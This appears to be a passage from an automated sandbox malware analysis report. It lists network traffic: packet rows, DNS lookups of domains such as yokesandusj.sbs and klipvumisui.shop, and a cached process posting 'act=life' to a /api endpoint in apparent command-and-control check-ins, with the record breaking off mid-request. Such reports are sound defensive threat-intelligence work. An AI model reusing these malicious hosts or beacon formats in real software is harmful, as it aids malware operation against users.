                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.597778082 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.597800970 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.597848892 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.597856998 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.597882032 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.597906113 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.600028038 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677120924 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677143097 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677216053 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677237034 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677308083 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677386045 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677424908 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677462101 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677469015 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677499056 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.677520990 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.683533907 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.683556080 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.683618069 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.683625937 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.683665991 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.683727980 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684170961 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684187889 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684237957 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684243917 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684279919 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684542894 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684565067 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684583902 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684588909 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684627056 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.684668064 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.685219049 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.685237885 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.685302019 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.685308933 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.685352087 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.686055899 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.686072111 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.686120987 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.686136961 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.686145067 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.686186075 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.686216116 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.688673019 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.765748978 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.765779018 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.765824080 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.765834093 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.765887022 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.765893936 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.766141891 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.766165972 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.766199112 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.766204119 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.766241074 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.766263008 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772238970 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772263050 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772315025 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772321939 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772361040 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772741079 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772763968 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772830963 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772836924 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772862911 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772869110 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773240089 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773260117 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773308039 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773313999 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773339987 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773363113 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773751974 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773773909 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773813009 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773818970 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773849010 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773869991 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774596930 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774611950 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774655104 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774656057 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774667978 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774688959 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774719954 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774727106 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774736881 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774775982 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.778053999 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854325056 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854346991 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854463100 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854489088 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854526043 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854832888 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854852915 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854902983 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854911089 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854945898 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.860871077 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.860891104 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.860960007 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.860971928 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861007929 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861355066 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861373901 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861423016 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861429930 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861463070 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861759901 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861777067 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861825943 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861830950 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861865044 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862221003 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862235069 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862276077 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862282038 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862310886 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862327099 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862762928 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862795115 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862826109 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862833977 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862869978 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.862879992 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.863003016 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.863027096 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.863058090 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.863065004 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.863080025 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.863100052 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.869416952 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.942965031 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.942989111 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.943094015 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.943113089 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.943154097 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.943350077 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.943368912 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.943403959 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.943412066 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.943444014 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.943459034 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.949500084 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.949527979 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.949579954 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.949596882 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.949620008 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.949642897 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.949945927 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.949961901 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.950006962 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.950015068 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.950045109 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.950256109 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.950287104 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.950310946 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.950314999 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.950340986 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.950345993 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.950392008 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.968467951 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.968489885 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.968527079 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.968533039 CET44349927172.67.208.58192.168.2.5

                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:07.429919004 CET4958153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:07.439054012 CET53495811.1.1.1192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:41.819010019 CET5382853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:41.833204031 CET53538281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:53.100218058 CET5223453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:53.157381058 CET53522341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.070966005 CET6199553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.083456993 CET53619951.1.1.1192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.849848032 CET6157253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.858376026 CET53615721.1.1.1192.168.2.5

                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:07.429919004 CET192.168.2.51.1.1.10x1e4aStandard query (0)iqEcklosdyCxilSwLDOcKOPdDDq.iqEcklosdyCxilSwLDOcKOPdDDqA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:41.819010019 CET192.168.2.51.1.1.10x56daStandard query (0)yokesandusj.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:53.100218058 CET192.168.2.51.1.1.10xf8cStandard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.070966005 CET192.168.2.51.1.1.10x369fStandard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.849848032 CET192.168.2.51.1.1.10xe6ddStandard query (0)dfgh.onlineA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:07.439054012 CET1.1.1.1192.168.2.50x1e4aName error (3)iqEcklosdyCxilSwLDOcKOPdDDq.iqEcklosdyCxilSwLDOcKOPdDDqnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:19.359612942 CET1.1.1.1192.168.2.50xdbc0No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:19.359612942 CET1.1.1.1192.168.2.50xdbc0No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:19.359612942 CET1.1.1.1192.168.2.50xdbc0No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:19.359612942 CET1.1.1.1192.168.2.50xdbc0No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:19.359612942 CET1.1.1.1192.168.2.50xdbc0No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:19.359612942 CET1.1.1.1192.168.2.50xdbc0No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:19.359612942 CET1.1.1.1192.168.2.50xdbc0No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:19.359612942 CET1.1.1.1192.168.2.50xdbc0No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:19.359612942 CET1.1.1.1192.168.2.50xdbc0No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:41.833204031 CET1.1.1.1192.168.2.50x56daNo error (0)yokesandusj.sbs104.21.44.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:41.833204031 CET1.1.1.1192.168.2.50x56daNo error (0)yokesandusj.sbs172.67.201.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:53.157381058 CET1.1.1.1192.168.2.50xf8cNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.083456993 CET1.1.1.1192.168.2.50x369fNo error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.083456993 CET1.1.1.1192.168.2.50x369fNo error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.858376026 CET1.1.1.1192.168.2.50xe6ddName error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                              • yokesandusj.sbs
                                                                                                                                                                                                                                                              • cegu.shop
                                                                                                                                                                                                                                                              • klipvumisui.shop

                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.549842104.21.44.1594431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:42 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
                                                                                                                                                                                                                                                              2025-01-06 11:16:42 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2025-01-06 11:16:42 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:42 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ktcl4s283t7j68vit4esspj68r; expires=Fri, 02 May 2025 05:03:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Ig4PtO9hOfJzKk3ZWUSiiua0uz%2FQJP59EIO8ckFG%2BybEFxYJ9yOlQJ4urP4RAQUxlgTVFrQIBB5KxbYwJExzjvPBUE%2BMhCX1m2rPoYFEn0H3lHl75GeDrrWh%2B6c88jNnus%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c253a2c41e1-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1686&rtt_var=651&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1656267&cwnd=243&unsent_bytes=0&cid=32153973a22194ac&ts=502&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:42 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2025-01-06 11:16:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.549846104.21.44.1594431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 78
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
